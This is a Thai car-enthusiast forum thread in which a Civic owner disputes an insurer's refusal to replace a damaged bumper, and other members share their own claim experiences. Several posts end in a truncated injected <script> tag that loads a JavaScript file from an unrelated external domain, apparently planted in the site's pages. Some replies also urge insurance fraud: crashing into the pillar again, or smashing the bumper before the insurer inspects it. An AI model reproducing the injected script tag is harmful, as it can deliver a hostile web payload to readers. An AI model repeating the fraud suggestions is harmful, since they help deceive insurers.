ตอบ
BastardBoy

ชื่อเล่น: เอ็กซ์

เข้าร่วม: 27 พฤศจิกา 2010
ตอบ: 160

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 244
ให้คำขอบคุณ: 318

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 18 กรกฎา 2011 20:20 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
ปรึกษาเืพื่อน ๆ หน่อยครับ เรื่องมีอยู่ว่าผมขับรถชนเสาตอนวนรถลงจากที่จอดรถ และไปแจ้งเคลมแล้วได้ใบมาเรียบร้อย แต่พอเอาไปเข้าศูนย์ ศูนย์แจ้งกลับมาว่า ซ่อมไม่ได้ ต้องเปลี่ยน แต่ประกันไม่ให้เปลี่ยนให้ซ่อม ซึ่งทางศูนย์ย้ำว่า มันซ่อมไม่ได้แล้วเพราะสภาพกันชนแย่มากผ่านการซ่อมมาเยอะแล้ว (น่าจะเป็นเจ้าของเดิม) ถ้าจะให้ฝืนซ่อม ศูนย์ จะไม่รับประกันคุณภาพงาน เพราะซ่อมไปไม่นานก็เสียอีก พรุ่งนี้จะไปเคลียร์กับทั้งศูนย์กะประกันฯ ปรึกษาเพื่อน ๆ ว่ากรณีแบบนี้จะพูดกะประกันยังไงดีให้เค้ายอมรับที่จะเปลี่ยนกันชนให้ ซึ่งประกันผมก็ชั้น 1 ด้วย

ขอบคุณล่วงหน้าครับบบ
john

เข้าร่วม: 29 มีนา 2010
ตอบ: 570

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 3392
ให้คำขอบคุณ: 2458

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 18 กรกฎา 2011 20:26 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
ต้องคุยให้ได้นะครับ อย่ายอม คุยได้อยู่แล้ว
ได้รับคำขอบคุณจาก: BastardBoy 
BastardBoy

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 18 กรกฎา 2011 20:32 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
john พิมพ์ว่า:
ต้องคุยให้ได้นะครับ อย่ายอม คุยได้อยู่แล้ว

จะพยายามคร้าบบบบ
benzd

ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 18 กรกฎา 2011 20:35 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
สู้ๆครับ ประกันชั้น1แพงก็แพง
jaak

เข้าร่วม: 05 สิงหา 2009
ตอบ: 56

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 22
ให้คำขอบคุณ: 44
จันทร์, 18 กรกฎา 2011 20:47 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
ประกันของอะไรครับเนี่ย ของผมซ่อมไม่เคยมีปัญหานะ อู่จัดให้เสร็จสรรพ ประกันไม่เคยโทรมาถามเลยด้วยซ้ำ
kai_es

เข้าร่วม: 19 เมษา 2010
ตอบ: 1133

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 714
ให้คำขอบคุณ: 365

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 18 กรกฎา 2011 20:50 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
อย่ายอมนะ เสียตังทำชั้น 1 ทั้งที่
BastardBoy

จันทร์, 18 กรกฎา 2011 20:52 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
jaak พิมพ์ว่า:
ประกันของอะไรครับเนี่ย ของผมซ่อมไม่เคยมีปัญหานะ อู่จัดให้เสร็จสรรพ ประกันไม่เคยโทรมาถามเลยด้วยซ้ำ

ของสินทรัพย์ประกันภัยครับ เข้าซ่อมที่ศูนย์ Honda พระราม 9

kai_es พิมพ์ว่า:
อย่ายอมนะ เสียตังทำชั้น 1 ทั้งที่

ครับ สู้ ครับ
jaak

เข้าร่วม: 05 สิงหา 2009
ตอบ: 56

สมาชิกสับสน
สมาชิกสับสน

ให้คำขอบคุณ: 44
จันทร์, 18 กรกฎา 2011 21:32 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
อ่อ เพื่อนผมก็บ่นนะ ว่าซ่อมศูนย์จะเรื่องมาก แต่ว่าซ่อมที่อู่(บางอู่มั้ง) จะง่ายกว่าเยอะ เหมือนของผม อู่จะช่วยเต็มที่เพราะอู่ก็อยากได้ตังค์เยอะๆอ่ะนะ ผมใช้คุ้มภัยครับ <script src="https://sport32news.com/civicesgroup.js"></
Pete Villian

ชื่อเล่น: พีท

เข้าร่วม: 08 พฤษภาคม 2009
ตอบ: 534

ได้รับคำขอบคุณ: 876
ให้คำขอบคุณ: 402

อังคาร, 19 กรกฎา 2011 08:51 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
เข้าอู่นอกกทั่วไปจะง่ายกว่านะครับ บางทีงานจะออกมาดีกว่าศูนย์อีกครับ

เรื่องกันชนส่วนมากเขาจะเปลี่ยนเลยนะครับ เพราะมันเป็นพลาสติกแตกง่ายและซ่อมกลับมาให้เหมือนเดิมยากหน่อยครับ
Ton-

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
อังคาร, 19 กรกฎา 2011 09:28 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
ถ้าประกันตีว่าเป็นความเสียหายที่เกิดมาก่อนทีี่จะมาทำประกันกับมัน มันก็จะเืรื่องมากแบบนี้อ่ะแหละ

ว่าแต่มันพังยังไงถึงบอกซ่อมไม่ได้ ถ้าเกิดหูยืดขาดจากการที่เราไปชนมา ผมว่ายังไงก็ต้องเปลี่ยน แต่ถ้าแค่สีถลอก แต่ 0 มันบอกว่าอย่างอื่นพังเยอะ อันเนี้ยคุยยาก

ว่าแต่คุณยังทำประกันซ่อม 0 ได้อีกเหรอครับ ปกติรถเกิน 5 ปี มันก็ไม่ให้ทำประกันซ่อม 0 แล้ว ซ่อมอู่กันเกือบทั้งหมด
CHAMP_ME16

ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 19 กรกฎา 2011 09:34 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
ถามนิดครับ ศูนย์ Honda พระราม 9 ใช่อู่ในเครือประกันหรือเปล่าครับ
ถ้าใช่ผมว่าไม่เกี่ยวกับเราแล้วน่ะครับ ก็ให้ทางศูนย์คุยกับประกันเองเลยครับเราแค่มีหน้าที่แจ้งเคลมอย่างเดียวครับ

ปล.จากประสบการณ์ส่วนตัวน่ะครับ
earnvip

ชื่อเล่น: หนึ่ง

เข้าร่วม: 17 มิถุนา 2011
ตอบ: 34

น้องใหม่
น้องใหม่

ให้คำขอบคุณ: 1

อังคาร, 19 กรกฎา 2011 10:02 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
รถของคุณเป็นแบบซ่อมห้างหรือเลจซ่อมอู่คับ...ถ้าซ่อมห้างคุณเปลี่ยนได้ครับ..แต่ถ้าเป็นเลจอู่แล้วไปซ่อมในห้างถ้าเปลี่ยนของคุณอาจจะต้องจ่ายส่วนต่างครับเพราะประกันจะต้องคุมราคาค่าซ่อมอีกครับ...ส่วนการดูกันชนว่าควรเปลี่ยนหรือว่าซ่อมเค้าจะดูจากความเสียหายครับถ้ากันชนฉีกขาดหรือมีส่วนที่แตกออกแล้วหลนหายไปมันก็ต้องเปลี่ยน..แต่ถ้าครูดเนื่อพลาสติกเป็นลอยลึกหรือหูกันชนขาดผมว่าน่าจะซ่อมได้ครับ..ลองดูคับเป็นกำลังใจให้คับ
ได้รับคำขอบคุณจาก: BastardBoy  kort999 
BastardBoy

อังคาร, 19 กรกฎา 2011 10:13 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
คุยละครับ สรุปประกันให้จ่ายเฉพาะค่าของ คนละครึ่ง (กำลังต่อรองใหม่อยู่) ค่าสีค่าแรงไม่ต้องจ่าย ให้เหตุผลว่า เป็นสิ่งที่เกิดมาก่อนทำประกัน เพราะเป็นการซ่อมมาจากเจ้าของเก่า ซึ่งซ่อมมาจนเละมากอ่ะครับ ผมไปดูสภาพมาละ ซึ่งประกันแจ้งว่าถ้าเป็นแผลจากการชนเค้าเปลี่ยนให้เลยจะไม่มาคุยแบบนี้ ซึ่งแผลที่เกิดขึ้นมันครูด อ่ะครับ ไม่ได้ฉีกขาด ทางศูนย์ก็ช่วยคุยแล้ว แต่ประกันยังยืนกรานเหมือนเดิม คือถ้าจะไม่เปลี่ยนก็ซ่อมไปตามสภาพ มายังไงซ่อมกลับไปอย่างนั้น ทำเฉพาะสีนั้นเองไม่เกี่ยวกะสภาพภายในที่พัง ซึ่งถ้าซ่อมกลับไปแล้วสีแตกลาย หรือกันชนหลุดออกมาอีกศูนย์จะไม่รับประกันงานให้ ผมต้องเสียค่าใช้จ่ายเอง

ประกันของผมเป็นแบบซ่อมอู่ครับ แต่ศูนย์พระราม 9 อยู่ในเครือของสินทรัพย์เลยมาเข้าที่นี่ครับใกล้บ้านด้วย
nagamura

ชื่อเล่น: ธัน

เข้าร่วม: 08 กุมภา 2011
ตอบ: 447

ได้รับคำขอบคุณ: 1803
ให้คำขอบคุณ: 815

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 19 กรกฎา 2011 10:22 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
เปลี่ยนใด้ครับทุกกรณี.......ของผมเปลี่ยนมา2รอบละกันชนกับเสกิตร์......ชั้น1นะครับอิอิมะใช่ชั้น3 <script src="https://sport32news.com/civicesgroup.js"></
nickindy

ชื่อเล่น: นิคคับ

เข้าร่วม: 25 กันยา 2009
ตอบ: 799

Guru ES
Guru ES

ได้รับคำขอบคุณ: 2669
ให้คำขอบคุณ: 781

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 20 กรกฎา 2011 08:40 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
เป็นผมก็ชนเสาเต็มๆ อีกซักที และเรียกมันมาเครม ประกันตั้งชั้น 1 ไง๋เรื่องเยอะจัง

รถผมพึ่งโดนชนท้าย ประกันชั้น 3 หูยึดขาด เข้าอู่ประกัน เค้าสั่งเปลี่ยนกันชนให้เลย

เพราะอู่บอกว่า ท่าหูยึดขาด ซ่อมยาก ไม่เหมือนเดิมคับ
BastardBoy

พุธ, 20 กรกฎา 2011 22:57 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
nagamura พิมพ์ว่า:
เปลี่ยนใด้ครับทุกกรณี.......ของผมเปลี่ยนมา2รอบละกันชนกับเสกิตร์......ชั้น1นะครับอิอิมะใช่ชั้น3 <script src="https://sport32news.com/civicesgroup.js"></

นั่นดิ ผมก็บอกไปแบบนี้ละว่า ชั้น 1 นะไม่งั้นผมจะทำไปทำไม เค้าก้ออ้างว่า เป็นรอยซ่อมก่อนทำประกันเวรจริง

nickindy พิมพ์ว่า:
เป็นผมก็ชนเสาเต็มๆ อีกซักที และเรียกมันมาเครม ประกันตั้งชั้น 1 ไง๋เรื่องเยอะจัง

รถผมพึ่งโดนชนท้าย ประกันชั้น 3 หูยึดขาด เข้าอู่ประกัน เค้าสั่งเปลี่ยนกันชนให้เลย

เพราะอู่บอกว่า ท่าหูยึดขาด ซ่อมยาก ไม่เหมือนเดิมคับ

รอผลพรุ่งนี้ก่อนครับ ถ้ายังไม่ยอมอีกคงต้องลองวิธีนี้ครับ แต่ ยังเสียว ๆ กลัวว่าชนไปแล้วจะไม่เสียแค่กันชน เหอๆๆ
BastardBoy

ศุกร์, 22 กรกฎา 2011 09:55 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
มาแจ้งผลครับ สรุปว่า ประกันชนะ - -" ศูนย์โทรมาบอกว่า จะซ่อมให้และจะทำให้กันชนออกมาดีที่สุด ซึ่งผมก้อบอกไปว่า ถ้าออกมาไม่ดี ต่อให้คุณบอกไม่รับประกันงานคุณก็ต้องแก้ให้ผม เค้าก็รับ ๆ ไปนะ แต่ไม่รู้ถ้าเกิดขึ้นจริงจะเป็นยังไง เฮ้อออออ แต่ในใจก็คิดไปว่า ทำ ๆ ไป เอารถออกมาใช้ก่อน เพราะเดี๋ยวใกล้ประกันหมด ประมาณเดือนตุลาฯ ผมจะเข้าอู่นอกเคลมรอบคันเพราะกระโปรงรถมีรอยลักยิ้มอยู่ เกิดจากหัวฉีด LPG ติดสูงไป T__T กะว่าจะให้อู่ช่วยดูกันชนว่าจะเคลมเปลี่ยนไปเลยได้ไหม เฮ้อออ หมดปีนี้คิดว่าคงลาจากกันอ่ะครับ สินทรัพย์ คงหาเจ้าอื่นต่อประักันแทน
mark_es03

ชื่อเล่น: มาร์คกี้

เข้าร่วม: 01 กันยา 2010
ตอบ: 2301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1422
ให้คำขอบคุณ: 2183

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 22 กรกฎา 2011 10:46 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
Pete Villian

ชื่อเล่น: พีท

เข้าร่วม: 08 พฤษภาคม 2009
ตอบ: 534

ได้รับคำขอบคุณ: 876
ให้คำขอบคุณ: 402

ศุกร์, 22 กรกฎา 2011 11:38 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
แย่ครับ

ประกันชั้น 1 แท้ๆ ยังทำแบบนี้ ครบปีแล้วเปลี่ยนเจ้าใหม่ดีกว่าครับ
BastardBoy

ศุกร์, 22 กรกฎา 2011 19:25 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
Pete Villian พิมพ์ว่า:
แย่ครับ

ประกันชั้น 1 แท้ๆ ยังทำแบบนี้ ครบปีแล้วเปลี่ยนเจ้าใหม่ดีกว่าครับ

ใช่ครับ ไม่อยากคิดเลยว่าถ้าเป็นชั้น 2 ชั้น 3 จะเป็นไง
ratachai

เข้าร่วม: 22 กรกฎา 2010
ตอบ: 596

ได้รับคำขอบคุณ: 631
ให้คำขอบคุณ: 105

ศุกร์, 22 กรกฎา 2011 19:56 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
เข้าใจว่าเพิ่งซื้อรถต่อมานะคับประกันเก่ายังอยู่ ให้อ่านตรงกรมทัณ นะคับมันระบุไว้ชัดเจน แล้วค่อยคุยกับประกันได้อย่างชัดเจนนะคับ ประกันบริษัทนี้ไม่ค่อยดีนะคับถ้าไงหมดเปลี่ยนเป็นสินมั่นคงก็ดีนะคับ แนะนำให้อู่หรือศุณคุยกันทางประกันเลยเราไม่ต้องออกแร็ง ของสินทรัพชั้น1ก็จริงจ่ายเบี้ยถูกนะคับบริการก็อย่างเบี้ยประกันอะคับ ถ้าจำไม่ผิดชั้น1 จ่ายหมื่นต้นๆเองของไทยพานิช21000บาทผมใช้อยู่เครมอะไรไม่เคยถาม บอกแต่ว่าให้เลือกอู่เอามีอู่ให้เลือกเยอะเลยตอนนี้ใช้สินมั่นคงยังไม่เคยเครมเบี้ยถูกกว่า5พันบาทครับ
ได้รับคำขอบคุณจาก: BastardBoy  pry1999 
BastardBoy

ศุกร์, 22 กรกฎา 2011 23:04 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
ratachai พิมพ์ว่า:
เข้าใจว่าเพิ่งซื้อรถต่อมานะคับประกันเก่ายังอยู่ ให้อ่านตรงกรมทัณ นะคับมันระบุไว้ชัดเจน แล้วค่อยคุยกับประกันได้อย่างชัดเจนนะคับ ประกันบริษัทนี้ไม่ค่อยดีนะคับถ้าไงหมดเปลี่ยนเป็นสินมั่นคงก็ดีนะคับ แนะนำให้อู่หรือศุณคุยกันทางประกันเลยเราไม่ต้องออกแร็ง ของสินทรัพชั้น1ก็จริงจ่ายเบี้ยถูกนะคับบริการก็อย่างเบี้ยประกันอะคับ ถ้าจำไม่ผิดชั้น1 จ่ายหมื่นต้นๆเองของไทยพานิช21000บาทผมใช้อยู่เครมอะไรไม่เคยถาม บอกแต่ว่าให้เลือกอู่เอามีอู่ให้เลือกเยอะเลยตอนนี้ใช้สินมั่นคงยังไม่เคยเครมเบี้ยถูกกว่า5พันบาทครับ

ขอบคุณครับ เปลี่ยนแน่ ๆ ครับ
pry1999

ชื่อเล่น: หนุ่ม

เข้าร่วม: 13 มิถุนา 2009
ตอบ: 463

ได้รับคำขอบคุณ: 164
ให้คำขอบคุณ: 483

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 26 กรกฎา 2011 23:48 - ปรึกษาเรื่องแจ้งเคลมประกัน.. ประกันให้ซ่อม vs ศูนย์บอกต้องเปลี่ยน
น่าจะทุบให้แตกไปเลยครับ ก่อนไปหาประกัน....... ยังไงชั้น 1 เปลี่ยนได้อยู่แล้ว...... แล้วถามประกันไปเลยครับ แตกงี้จะซ่อมอีกเหรอครับ...ทำประกันที 15000 ไม่ขาด
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.